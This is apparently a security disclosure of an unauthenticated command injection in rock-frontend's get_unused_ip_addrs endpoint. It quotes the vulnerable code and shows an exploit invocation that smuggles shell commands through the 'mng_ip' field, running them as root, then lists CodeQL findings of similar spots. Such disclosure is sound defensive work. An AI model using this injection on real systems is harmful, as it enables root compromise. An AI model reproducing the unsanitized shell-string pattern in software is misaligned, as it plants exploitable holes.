rock-frontend Remote Code Execution Vulnerability

[ceballosm]

rock-frontend kickstart_controller.py does not sanitize user input in get_unused_ip_addrs() allowing for remote unauthenticated code execution.

The vulnerability can be viewed here:

 97 @app.route('/api/get_unused_ip_addrs', methods=['POST'])
 98 def get_unused_ip_addrs() -> Response:
 99     """
100     Gets unused IP Addresses from a given network.
101     :return:
102     """
103     payload = request.get_json()
104     cidr = netmask_to_cidr(payload['netmask'])
105     if cidr <= 24:
106         command = "nmap -v -sn -n %s/24 -oG - | awk '/Status: Down/{print $2}'" % payload['mng_ip']
107     else:
....

Where on line 106, the json object 'mng_ip' can be abused by appending the user controlled value of an ip followed with shell meta-characters allowing for arbitrary os commands. Once interpreted, the os commands will run as root.

$ ruby rock-frontend_exploit_1.rb 192.168.2.113 "whoami && pwd && ps aux|grep whoami"
root
/opt/rock-frontend/backend
root      3704  0.0  0.0 115248  1420 ?        S    10:02   0:00 /bin/sh -c nmap -v -sn -n 192.168.1.163|whoami && pwd && ps aux|grep whoami||''|/24 -oG - | awk '/Status: Down/{print $2}'
root      3708  0.0  0.0 112648   940 ?        R    10:02   0:00 grep whoami

[ceballosm]

running that application through CodeQL with a simple query like so:

import python 
...

exists(GlobalVariable os | os = ((Name)c.getFunc()).getVariable() and os.getId() = "shell")
...

other similar issues popped up.

shell()
common_controller.py:148    Potential OS Command Injection.

shell()
health_controller.py:27     Potential OS Command Injection.

shell()
health_controller.py:47     Potential OS Command Injection.

shell()
kickstart_controller.py:27  Potential OS Command Injection.

shell()
kickstart_controller.py:110 Potential OS Command Injection.